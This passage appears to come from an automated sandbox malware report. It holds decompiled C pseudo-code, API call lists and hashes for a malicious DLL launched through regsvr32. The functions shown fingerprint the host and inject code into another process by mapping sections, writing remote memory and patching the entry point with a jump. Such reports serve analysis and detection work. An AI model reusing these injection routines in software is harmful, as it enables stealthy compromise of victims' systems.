				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E1000BA05(); // executed
				 *(_t222 + 0x110) = _t88;
				_t178 =  *_t88;
				if(E1000BB8D( *_t88) == 0) {
					_t90 = E1000BA62(_t178, _t222); // executed
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220, executed
				_t91 = E1000E3F1(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
				_t92 = E1000E3B6(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
				 *(_t222 + 0x224) = _t162;
				_v12 = 0x80;
				_v8 = 0x100;
				_t22 = _t222 + 0x114; // 0x114
				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
					GetLastError();
				}
				_t97 =  *0x1001e694; // 0x219fbf8
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114, executed
				_t103 = E1000B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E1000B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E10008FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E1000B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess(); // executed
				_t111 = E1000BBDF(_t110); // executed
				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x1001e684; // 0x219faa0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E100095E1(_t199, 0x10c);
				_t200 =  *0x1001e684; // 0x219faa0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x1001e684; // 0x219faa0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E100085D5( &_v8);
				_t124 =  *0x1001e684; // 0x219faa0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E10009640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x1001e684; // 0x219faa0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x1001e684; // 0x219faa0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x1001e684; // 0x219faa0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x1001e684; // 0x219faa0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x1001e684; // 0x219faa0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x1001e684; // 0x219faa0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E100122D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
				_t145 = E1000CD33(_t79); // executed
				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
				return _t222;
			}






















































        0x1000d01f
        0x1000d029
        0x1000d035
        0x1000d03a
        0x1000d03f
        0x1000d3ff
        0x1000d3ff
        0x1000d04c
        0x1000d052
        0x1000d057
        0x1000d05d
        0x1000d06d
        0x1000d079
        0x1000d079
        0x1000d082
        0x1000d088
        0x1000d08a
        0x1000d093
        0x1000d093
        0x1000d09f
        0x1000d0a3
        0x1000d0a8
        0x1000d0ae
        0x1000d0b7
        0x1000d0c5
        0x1000d0cc
        0x1000d0d1
        0x1000d0d1
        0x1000d0d2
        0x1000d0b9
        0x1000d0b9
        0x1000d0b9
        0x1000d0d8
        0x1000d0de
        0x1000d0e3
        0x1000d0e9
        0x1000d0f1
        0x1000d0fb
        0x1000d108
        0x1000d113
        0x1000d11b
        0x1000d13c
        0x1000d13e
        0x1000d13e
        0x1000d140
        0x1000d14a
        0x1000d156
        0x1000d166
        0x1000d16c
        0x1000d172
        0x1000d174
        0x1000d185
        0x1000d18b
        0x1000d191
        0x1000d196
        0x1000d19c
        0x1000d1a2
        0x1000d1a7
        0x1000d1ac
        0x1000d1ac
        0x1000d1b2
        0x1000d1b2
        0x1000d1bb
        0x1000d1c7
        0x1000d1cf
        0x1000d1d3
        0x1000d1d3
        0x1000d1cf
        0x1000d1d7
        0x1000d1dd
        0x1000d1e3
        0x1000d1ea
        0x1000d1fb
        0x1000d201
        0x1000d209
        0x1000d210
        0x1000d212
        0x1000d223
        0x1000d229
        0x1000d22e
        0x1000d231
        0x1000d234
        0x1000d23a
        0x1000d240
        0x1000d242
        0x1000d248
        0x1000d251
        0x1000d254
        0x1000d254
        0x1000d257
        0x1000d25f
        0x1000d26a
        0x1000d270
        0x1000d261
        0x1000d263
        0x1000d263
        0x1000d279
        0x1000d279
        0x1000d27f
        0x1000d287
        0x1000d292
        0x1000d297
        0x1000d29d
        0x1000d29f
        0x1000d2ac
        0x1000d2ad
        0x1000d2ae
        0x1000d2b9
        0x1000d2bb
        0x1000d2c2
        0x1000d2c2
        0x1000d2cc
        0x1000d2d1
        0x1000d2d6
        0x1000d2d6
        0x1000d2dc
        0x1000d2e3
        0x1000d2e4
        0x1000d2f1
        0x1000d304
        0x1000d309
        0x1000d30e
        0x1000d317
        0x1000d317
        0x1000d31d
        0x1000d322
        0x1000d328
        0x1000d32e
        0x1000d333
        0x1000d33c
        0x1000d33e
        0x1000d345
        0x1000d345
        0x1000d34b
        0x1000d353
        0x1000d358
        0x1000d359
        0x1000d35e
        0x1000d367
        0x1000d369
        0x1000d374
        0x1000d374
        0x1000d37d
        0x1000d385
        0x1000d38c
        0x1000d391
        0x1000d3a0
        0x1000d3b8
        0x1000d3bf
        0x1000d3cd
        0x1000d3df
        0x1000d3e6
        0x1000d3ee
        0x1000d3f3
        0x00000000

        APIs
          • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
        • GetCurrentProcessId.KERNEL32 ref: 1000D046
        • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
        • GetCurrentProcess.KERNEL32 ref: 1000D09F
        • LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
        • GetLastError.KERNEL32 ref: 1000D13E
        • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
        • GetLastError.KERNEL32 ref: 1000D172
        • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
        • GetCurrentProcess.KERNEL32 ref: 1000D20E
          • Part of subcall function 1000BA62: CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06
        • memset.MSVCRT ref: 1000D229
        • GetVersionExA.KERNEL32(00000000), ref: 1000D234
        • GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
        • IsWow64Process.KERNEL32(00000000), ref: 1000D251
        • GetSystemInfo.KERNEL32(?), ref: 1000D26A
        • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: Process$Current$ErrorFileLastModuleName$AccountAllocByteCharCloseDirectoryHandleHeapInfoLookupMultiSystemVersionWideWindowsWow64memset
        • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
        • API String ID: 2155830292-2706916422
        • Opcode ID: b5dd94d2bbba0da44d3b5b8615bbbb5f356fccea26f3f649cc03eb97a5baf4da
        • Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
        • Opcode Fuzzy Hash: b5dd94d2bbba0da44d3b5b8615bbbb5f356fccea26f3f649cc03eb97a5baf4da
        • Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000C6C0, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200nativeregistrymemoryCOMMON
        Download Yara Rule

        Control-flow Graph

        C-Code - Quality: 86%
        			E1000C6C0(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _v32;
				intOrPtr _v36;
				long _v40;
				void* _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				void* _t69;
				intOrPtr _t75;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct _EXCEPTION_RECORD _t116;
				void* _t126;
				void* _t131;
				intOrPtr _t134;
				void* _t140;
				void* _t141;

				_t69 =  *0x1001e688; // 0x2120590
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E1000E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x1001e780; // 0x219fbc8
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						NtClose(_v16);
					}
					return _v8;
				}
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
					if(_t106 != 0) {
						DestroyWindow(_t106); // executed
						UnregisterClassA( &_v56, 0);
					}
				}
				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_t126 = _v20;
					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
						goto L12;
					}
					_t140 = E10008669( *0x1001e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E1000861A( &_v32, 0x1ac4);
					_t141 =  *0x1001e688; // 0x2120590
					 *0x1001e688 = _t131;
					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E1000C63F(_v12, _v8, _v36);
					 *0x1001e688 = _t141;
					goto L14;
				}
			}


























        0x1000c6c6
        0x1000c6cd
        0x1000c6cf
        0x1000c6d1
        0x1000c6d3
        0x1000c6d6
        0x1000c6d9
        0x1000c6dc
        0x1000c6df
        0x1000c6e2
        0x1000c6e5
        0x1000c6ef
        0x1000c6f2
        0x1000c6f9
        0x1000c6fe
        0x1000c6fe
        0x1000c704
        0x1000c706
        0x1000c70f
        0x1000c8b5
        0x1000c8b9
        0x1000c8be
        0x1000c8c4
        0x1000c8c7
        0x1000c8c7
        0x1000c8cb
        0x1000c8d0
        0x1000c8e2
        0x1000c8e2
        0x1000c8eb
        0x1000c8f5
        0x1000c8f5
        0x1000c8fc
        0x1000c8fc
        0x1000c71e
        0x1000c738
        0x00000000
        0x00000000
        0x1000c743
        0x1000c74d
        0x1000c757
        0x1000c75a
        0x1000c760
        0x1000c767
        0x1000c768
        0x1000c769
        0x1000c772
        0x1000c773
        0x1000c774
        0x1000c776
        0x1000c779
        0x1000c77c
        0x1000c77f
        0x1000c782
        0x1000c78e
        0x1000c7b0
        0x1000c7b8
        0x1000c7bb
        0x1000c7c6
        0x1000c7c6
        0x1000c7b8
        0x1000c7f1
        0x1000c8b2
        0x00000000
        0x1000c7f7
        0x1000c803
        0x1000c818
        0x00000000
        0x00000000
        0x1000c82e
        0x1000c830
        0x1000c837
        0x00000000
        0x00000000
        0x1000c848
        0x1000c85f
        0x1000c86f
        0x1000c87b
        0x1000c880
        0x1000c886
        0x1000c896
        0x1000c8a2
        0x1000c8aa
        0x00000000
        0x1000c8aa

        APIs
        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
        • RegisterClassExA.USER32 ref: 1000C785
        • CreateWindowExA.USER32 ref: 1000C7B0
        • DestroyWindow.USER32 ref: 1000C7BB
        • UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
        • NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
        • NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
        • VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
        • WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F
          • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
        • GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
        • NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
        • NtClose.NTDLL(00000000), ref: 1000C8F5
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
        • String ID: 0$cdcdwqwqwq$sadccdcdsasa
        • API String ID: 2002808388-2319545179
        • Opcode ID: d9b7306b822ef4c75abda3a87e59d709b369751e76082ecbaf1197e7706a0768
        • Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
        • Opcode Fuzzy Hash: d9b7306b822ef4c75abda3a87e59d709b369751e76082ecbaf1197e7706a0768
        • Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10005F82, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104threadCOMMON
        Download Yara Rule

        Control-flow Graph

        C-Code - Quality: 82%
        			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				long _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				void* _t38;
				void* _t49;
				struct _SECURITY_ATTRIBUTES* _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq"); // executed
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E100085EF();
				_t19 = E1000980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E10008F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x1001e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E100095C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E100085C2( &_a8);
							_t53 =  &(_t53->nLength);
						} while (_t53 < 0x2710);
						E10012A5B( *0x1001e69c);
						 *_t55 = 0x7c3;
						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E100095E1(0x1001ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32); // executed
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E100085D5();
							_v8 = 0;
							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
							 *0x1001e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E100085D5();
					}
					goto L10;
				}
			}




















        0x10005f82
        0x10005f92
        0x10005f9c
        0x100060d0
        0x100060c3
        0x00000000
        0x100060c5
        0x100060d7
        0x10006098
        0x00000000
        0x10006098
        0x10005fa2
        0x10005faa
        0x10005fb1
        0x10005fb3
        0x00000000
        0x10005fc6
        0x10005fc6
        0x10005fcc
        0x10005fd2
        0x10005fe2
        0x10005fe7
        0x10005fef
        0x10005ff7
        0x10006013
        0x10006018
        0x1000601b
        0x1000601d
        0x1000601f
        0x1000602c
        0x10006035
        0x1000603e
        0x10006043
        0x10006044
        0x10006052
        0x1000605c
        0x1000606d
        0x10006072
        0x10006079
        0x10006080
        0x10006083
        0x1000608f
        0x10006090
        0x1000609c
        0x100060a5
        0x100060b7
        0x100060ba
        0x100060c1
        0x00000000
        0x00000000
        0x00000000
        0x100060c1
        0x10006092
        0x10006097
        0x00000000
        0x10005ff7

        APIs
        • OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
        • SetLastError.KERNEL32(000000AA), ref: 100060D7
          • Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
          • Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
          • Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
        • GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
        • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
        • GetLastError.KERNEL32 ref: 10005FEF
        • memset.MSVCRT ref: 10006013
        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
        • GetFileAttributesW.KERNEL32(00000000), ref: 10006083
        • CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
        • String ID: Hello qqq
        • API String ID: 3435743081-3610097158
        • Opcode ID: 6d402a79815b98af21a7f787fe15b69dd9dc40bdd27b4757cb6b1cb9915066dd
        • Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
        • Opcode Fuzzy Hash: 6d402a79815b98af21a7f787fe15b69dd9dc40bdd27b4757cb6b1cb9915066dd
        • Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1007792E, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 149 1007792e-1007797a 151 10077984-1007798a 149->151 152 1007797c-10077982 149->152 153 1007798f-10077994 151->153 154 100779a3-100779cb 152->154 155 10077996-1007799b 153->155 156 1007799d 153->156 157 10077a0f-10077ad5 VirtualAlloc call 10077685 call 10077655 VirtualAlloc call 100775dd VirtualFree 154->157 158 100779cd-100779cf 154->158 155->153 156->154 166 10077ad7-10077af1 call 10077685 157->166 167 10077af2-10077afe 157->167 158->157 159 100779d1-10077a0b VirtualAlloc 158->159 159->157 166->167 168 10077b05 167->168 169 10077b00-10077b03 167->169 172 10077b08-10077b23 call 10077655 168->172 169->172 175 10077b25-10077b38 call 10077534 172->175 176 10077b3d-10077b6c 172->176 175->176 178 10077b82-10077b8d 176->178 179 10077b6e-10077b7c 176->179 181 10077b8f-10077b98 178->181 182 10077ba8-10077bc5 VirtualProtect 178->182 179->178 180 10077b7e 179->180 180->178 181->182 185 10077b9a-10077ba2 181->185 183 10077bc7-10077bd3 182->183 184 10077bfa-10077cb1 call 100777b7 call 10077749 call 100777ed VirtualProtect 182->184 187 10077bd5-10077bec VirtualProtect 183->187 196 10077cb7-10077cdc 184->196 185->182 186 10077ba4 185->186 186->182 189 10077bf0-10077bf8 187->189 190 10077bee 187->190 189->184 189->187 190->189 197 10077ce5 196->197 198 10077cde-10077ce3 196->198 199 10077cea-10077cf5 197->199 198->199 200 10077cf7 199->200 201 10077cfa-10077d12 VirtualProtect 199->201 200->201 201->196 202 10077d14-10077d3b VirtualFree GetPEB 201->202 203 10077d40-10077d47 202->203 204 10077d4d-10077d67 203->204 205 10077d49 203->205 207 10077d6a-10077d93 call 1007785d call 10077d98 204->207 205->203 206 10077d4b 205->206 206->207
        APIs
        • VirtualAlloc.KERNEL32(00000000,00000814,00003000,00000040,00000814,10077380), ref: 100779EB
        • VirtualAlloc.KERNEL32(00000000,000004CA,00003000,00000040,100773E0), ref: 10077A22
        • VirtualAlloc.KERNEL32(00000000,00028122,00003000,00000040), ref: 10077A82
        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077AB8
        • VirtualProtect.KERNEL32(10000000,00000000,00000004,1007790D), ref: 10077BBD
        • VirtualProtect.KERNEL32(10000000,00001000,00000004,1007790D), ref: 10077BE4
        • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D), ref: 10077CB1
        • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D,?), ref: 10077D07
        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077D23
        Memory Dump Source
        • Source File: 00000004.00000002.516721400.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10077000_regsvr32.jbxd
        Similarity
        • API ID: Virtual$Protect$Alloc$Free
        • String ID:
        • API String ID: 2574235972-0
        • Opcode ID: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
        • Instruction ID: e61e719fcc5ffd65f3e7435c319bc58e36d786470a44bd70215d6a9d31556276
        • Opcode Fuzzy Hash: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
        • Instruction Fuzzy Hash: F8D18D767086009FDB11CF14C8C0B927BA6FF8C750B194599ED6D9F25AD7B4B810CBA4
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000CB77, Relevance: 7.6, APIs: 5, Instructions: 105nativeCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 228 1000cb77-1000cb90 call 1000c4ce 231 1000cb96-1000cba4 call 1000c6c0 228->231 232 1000cc69-1000cc70 228->232 231->232 239 1000cbaa-1000cbe1 memset 231->239 233 1000cc80-1000cc87 232->233 234 1000cc72-1000cc79 FreeLibrary 232->234 236 1000cca3-1000cca9 233->236 237 1000cc89-1000cca2 call 1000861a 233->237 234->233 237->236 239->232 244 1000cbe7-1000cc27 NtProtectVirtualMemory 239->244 245 1000cc67 244->245 246 1000cc29-1000cc44 NtWriteVirtualMemory 244->246 245->232 246->245 247 1000cc46-1000cc65 NtProtectVirtualMemory 246->247 247->232 247->245
        C-Code - Quality: 93%
        			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				void* _v568;
				void _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t39;
				intOrPtr _t43;
				void* _t63;
				long _t65;
				void* _t70;
				void** _t73;
				void* _t74;

				_t73 = __edx;
				_t63 = __ecx;
				_t74 = 0;
				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
					_t74 = _t39;
					if(_t74 != 0) {
						memset( &_v744, 0, 0x2cc);
						_v744 = 0x10002;
						_push( &_v744);
						_t43 =  *0x1001e684; // 0x219faa0
						_push(_t73[1]);
						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
							_t70 = _v568;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t65 = 5;
							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
							_v8 = _t65;
							_v16 = _t70;
							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
								L6:
								_t74 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				_t32 =  *0x1001e77c; // 0x0
				if(_t32 != 0) {
					FreeLibrary(_t32);
					 *0x1001e77c =  *0x1001e77c & 0x00000000;
				}
